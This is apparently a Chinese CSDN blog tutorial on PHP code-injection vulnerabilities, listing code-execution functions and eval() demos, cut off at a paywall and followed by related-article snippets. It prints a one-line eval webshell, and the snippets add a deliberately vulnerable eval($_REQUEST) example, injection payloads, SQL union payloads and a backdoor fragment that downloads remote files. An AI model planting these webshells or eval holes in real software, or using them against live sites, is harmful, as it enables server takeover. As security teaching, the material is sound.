【PHP代码注入】PHP代码注入漏洞

最新推荐文章于 2023-05-16 10:44:14 发布
最新推荐文章于 2023-05-16 10:44:14 发布
阅读量6k 收藏 15
点赞数 3
分类专栏: Web漏洞 文章标签: PHP代码注入漏洞 PHP代码执行漏洞 PHP常见的代码执行函数和语句 PHP代码执行漏洞利用 PHP代码执行漏洞防御 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76334474/article/details/129373265
版权

漏洞原理

RCE为两种漏洞的缩写,分别为Remote Command/Code Execute,远程命令/代码执行

PHP代码注入也叫PHP代码执行(Code Execute)(Web方面),是指应用程序过滤不严,用户可以通过HTTP请求将代码注入到应用中执行。代码注入(代码执行)类似于SQL注入漏洞。SQLi是将SQL语句注入到数据库中执行,而代码执行则是可以把代码注入到应用中最终由服务器运行它。这样的漏洞如果没有特殊的过滤,相当于直接有了一个Web后门(可以在服务器上执行任意命令)的存在。

PHP代码注入与SQL注入区别:

双方的注入方式是类似的,都是构造语句绕过服务器的过滤去执行。

区别在于SQL注入是将语句注入到数据库中执行,而PHP代码执行则是通过将代码注入到应用中,最终由服务器运行

造成PHP代码注入前提条件:

  1. 程序中含有可以执行PHP代码的函数或者语言结构

  1. 传入该函数或语言结构的参数是客户端可控,可以直接修改或造成影响,且应用程序过滤不严。

漏洞危害

Web应用如果存在代码执行漏洞时非常危险的,这样的漏洞如果没有特殊的过滤,相当于直接有一个WEB后门的存在。可以通过代码执行漏洞继承Web用户权限,执行任意代码。如果服务器没有正确配置或Web用户权限比较高的话,我们可以读写目标服务器任意文件内容,甚至控制整个网站以及服务器。

PHP中常见的代码执行函数和语句

PHP中有很多函数和语句都会造成PHP代码执行漏洞。本文以PHP为例子来说明,代码执行漏洞。

● eval()                        将字符串当作php 代码执行
● assert()                      同样会作为PHP 代码执行
● preg_replace()                当php版本小于7时,当为 /e 时代码会执行
● call_user_func()              回调函数,可以使用is_callable查看是否可以进行调用
● call_user_fuc_array()         回调函数,参数为数组
● create_function()             创建匿名函数
● array_map()                   为数组的每个元素应用回调函数
● array_filter()                依次将 array 数组中的每个值传递到 callback函数。如果 callback 函数返回 true,则 array 数组的当前值会被包含,在返回的结果数组中。数组的键名保留不变。
● usort()                       使用自定义函数对数组进行排序

一句话木马就是利用的代码执行漏洞:

<?php @eval($_POST[cmd]);?>

eval()

作用: eval()函数会将字符串作为PHP代码执行。

该字符串必须是合法的 PHP 代码。eval函数自带输出功能,不需要再使用echo进行输出。

例子:

<?php
$str="phpinfo();";
eval($str);
?>

  1. 在网站根目录下新建codei文件夹,在该文件夹下新建文件eval.php,并写入如上代码

  1. 打开浏览器访问该文件,网页显示如下

  1. 我们如下修改代码,网页显示如下

<?php
$str="echo md5 (123456);";
eval($str);
?>

总结:通过以上两个例子,我们发现eval函数会将它的参数字符串按照PHP代码去执行

Q:那么eval函数的漏洞体现在哪里呢?

A:我们可以看到$str中的str是一个动态的变量,那如果这个动态的变量$str客户端可控,客户端可控意思就是客户端用户通过一些特殊的方法,这些方法可能是正常的业务,也可能是一些比较不正常的做法,然后造成$str客户端可控。简单来说,客户端可控就是用户的操作会影响到$str的值

  • 那么我们修改一下代码,让$str可控,代码如下,其中的全局变量$_GET也可以是$_REQUEST等其他预定义超全局数组变量(预定义超全局数组作用:包含了GET参数,POST参数还有COOKIE参数,也就是说get方式,post方式还有

最低0.47元/天 解锁文章
百事都可樂.
关注
  • 3
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
【Java代码审计】代码注入
大河之犬的博客
05-10 246
代码注入与命令注入相似,指在正常的 Java 程序中注入一段 Java 代码执行。相比于命令注入代码注入更具有灵活性,注入代码可以写入或修改系统文件,甚至可以直接注入执行系统命令的代码。在实际的漏洞利用中,直接进行系统命令执行常常受到各方面的因素限制,而代码注入因为灵活多变,可利用Java 的各种技术突破限制,造成更大的危害产生代码注入漏洞的前提条件是将用户输入的数据作为 Java 代码进行执行。try {// 从请求参数中获取类名、方法名和参数// 使用反射加载类Class
sql注入原理及php注入代码.doc
12-02
防止SQL注入需要在PHP代码中使用防注入函数,例如sec()函数。sec()函数可以对用户输入进行过滤,防止SQL注入。 防注入PHP代码可以在公共文件中require_once本文件,例如: ```php <?PHP //PHP整站防注入程序,...
PHP注入漏洞(附代码,具体步骤)
gl620321的博客
08-01 1715
一、命令注入(敏感函数定向法) 1.概念: 在PHP脚本中,我们可以对输入进行注入攻击。什么是注入注入即是通过利用无验证码变量构造特殊语句对服务器进行渗透。 注入的种类有很多,而不仅仅只是SQL Injection 2.分类 命令注入(Commend Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cro...
php命令注入
weixin_54252904的博客
04-17 585
eval() <?php if(isset($_REQUEST['code'])){ @$str=$_REQUEST['code']; eval($str); } ?> <?php if(isset($_GET['code'])){ @$str=$_GET['code']; eval($str); } ?> 提交变量[?code=phpinfo();] 我们提交以下参数也是可以的 [?code=${phpinfo()};] [?code=1;phpinfo();
php注入方法集锦
phphot
03-07 2388
%23  and passWord=mypass id=-1 union select 1,1,1 id=-1 union select char(97),char(97),char(97) id=1 union select 1,1,1 from members id=1 union select 1,1,1 from admin id=1 union select 1,1,1 from 
php文件注入思路
一只懒猫的博客
05-16 278
打开题目给定url,发现有一个文件上传按钮,猜测可能是需要上传php文件对服务器进行查看。得到了上级文件的目录,发现了flag.php文件,继续上传php文件,执行查看命令。2.上传一张jpg图像,发现给定了图像存储的路径。3.于是使用浏览器权限绕过的方式,上传php文件。修改这两个地方,上传php文件并执行。1.上传一个文档文档,提示无法上传。修改这两个地方,查看上级文件目录。
PHP代码审计----3、代码注入
七天
07-08 627
文章目录代码注入1、eval()函数2、preg_replace+/e()函数3、assert()4、call_user_func()5、call_user_func_array()6、create_function() 代码注入 PHP 可能出现代码注入函数:eval()、preg_replace+/e()、assert()、call_user_func()、call_user_func_array()、create_function()等 查找程序中程序中使用这些函数的地方,检查提交变量是否用户可控
php sql 注入例子代码
freshfox的博客
06-23 2784
&lt;?php $servername = "localhost"; $username = "root"; $password = "root"; $conn = mysqli_connect($servername, $username, $password); // 检测连接 if (!$conn) { die("Connection failed: " . mysqli_c...
PHP序列化/对象注入漏洞分析
10-22
总结来说,PHP序列化/对象注入漏洞是一个严重的安全问题,可能导致远程代码执行。开发者应避免在不受信任的数据来源上使用`unserialize()`,并确保对反序列化的对象进行充分的验证和清理。此外,使用最新版本的PHP和...
比较好用的PHP注入漏洞过滤函数代码
12-18
PHP //PHP整站防注入程序,需要在公共文件中require_once本文件 //判断magic_quotes_gpc状态 if (@get_magic_quotes_gpc ()) { $_GET = sec ( $_GET ); $_POST = sec ( $_POST ); $_COOKIE = sec ( $_COOKIE ); $_...
PHP中防止SQL注入实现代码
10-28
- 应用程序的安全编码实践,如遵循OWASP(开放网络应用安全项目)的指南,可以帮助防止SQL注入和其他安全漏洞。 总之,防止SQL注入PHP开发中的核心任务,需要结合多种方法和技术来确保数据安全。通过使用预处理...
通俗易懂的php注入代码
10-29
在Web开发中,SQL注入是一种常见的安全漏洞,攻击者可以通过输入恶意的SQL代码来获取、修改、删除数据库中的数据,甚至完全控制数据库服务器。PHP作为广泛应用的服务器端脚本语言,防止SQL注入是开发者必须关注的...
存在注入php代码,PHP代码审计之命令注入
weixin_35733852的博客
03-21 141
命令注入命令注入就是通过利用无验证变量构造特殊语句对服务器进行渗透.注入的种类有很多,而不仅仅是SQL Injection. php常见注入有以下几种(常见:,常见!!):命令注入 (Command Injection)Eval注入(Eval Injection)客户端脚本攻击(Script Injection)跨网站脚本攻击(Cross Site Scripting,XSS)SQL注入攻击(SQ...
Php网站脚本注入的原理
denseryan专栏
07-01 1037
今天,我来简述一下对于php注入攻击: Php的环境一般是apache+php+mysql,平常配置服务器一般是打开php.ini里的安全模式,将safe_mode设为on,还有就是将display_erors设为off,即关闭错误显示。还有一个非常重要的配置选项-----magic_quotes_gpc,高版本默认为on,以前的版本中默认为off。当magic_quotes_gpc为on的时候
一个PHP+Mysql手工注入例子
热门推荐
Praifire的博客
07-16 1万+
说下我的基本思路: 1、目标站点环境为:Windows+Apache+Mysql+PHP 2、存在SQL注入,能否直接写一句话木马 3、存在SQL注入,获取数据库中用户口令,登录应用系统后上传webshell 4、获取数据库口令登录phpMyAdimin,用phpMyAdmin写入一句话木马 不想因为使用扫描工具的缘故,导致服务器出现不稳定的现象,所以就纯手工咯。 下面具体来说明下
PHP安全编程:留心后门URL 直接可以通过URL访问(转)
weixin_33739523的博客
07-29 332
后门URL是指虽然无需直接调用的资源能直接通过URL访问。例如,下面WEB应用可能向登入用户显示敏感信息: &lt;?php $authenticated = FALSE; $authenticated = check_auth(); /* ... */ if ($authenticated) { include './sensitive.php'; } ...
php植入后门,网站被植入后门代码
weixin_29539039的博客
03-18 320
郎朗坤error_reporting(0);if($_GET['act'] == 'dl'){echo ('FN:URL:');if($_SERVER['REQUEST_METHOD'] == 'POST'){file_put_contents($_POST['fn'], file_get_contents($_POST['url']));}exit;}if($_GET['act'] == 'ul...
CTF PHP代码注入
最新发布
07-15
CTF(Capture The Flag)竞赛中,常见的一个攻击技术是PHP代码注入PHP Code Injection)。这种攻击利用了应用程序对用户输入的不充分验证和过滤,使得攻击者能够将恶意的PHP代码注入到应用程序中,从而执行任意代码或实施其他攻击。 以下是一些常见PHP代码注入漏洞场景和防范措施: 1. 用户输入的直接执行:如果应用程序直接将用户输入作为PHP代码执行,而没有进行充分的验证和过滤,攻击者可以通过提交恶意代码执行任意操作。防范措施是使用合适的输入验证和过滤,例如使用白名单来限制允许的操作或使用安全的函数来处理用户输入。 2. 变量覆盖:如果应用程序在解析用户输入时,没有正确处理变量覆盖的情况,攻击者可以通过构造特殊的输入来覆盖应用程序中的变量,并执行恶意操作。防范措施是在处理用户输入之前,将其赋值给新的变量,并确保不会被覆盖已有的变量。 3. 文件包含漏洞:如果应用程序在包含文件时没有进行充分的验证和过滤,攻击者可以通过构造特殊的文件路径来包含恶意的PHP代码文件。防范措施是使用白名单来限制允许包含的文件路径,并对用户输入进行适当的过滤和验证。 4. 数据库查询注入:虽然不是直接的PHP代码注入,但数据库查询注入漏洞可能导致执行恶意的SQL语句,从而进一步执行PHP代码。防范措施是使用参数化查询或预处理语句,避免直接将用户输入拼接到SQL查询中。 总之,要防范PHP代码注入漏洞,开发者应该始终进行充分的输入验证和过滤,使用安全的函数和方法处理用户输入,避免直接执行或拼接用户输入作为代码执行。同时,定期更新和修复应用程序中使用的框架、库和组件,以确保使用的是最新的安全版本。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值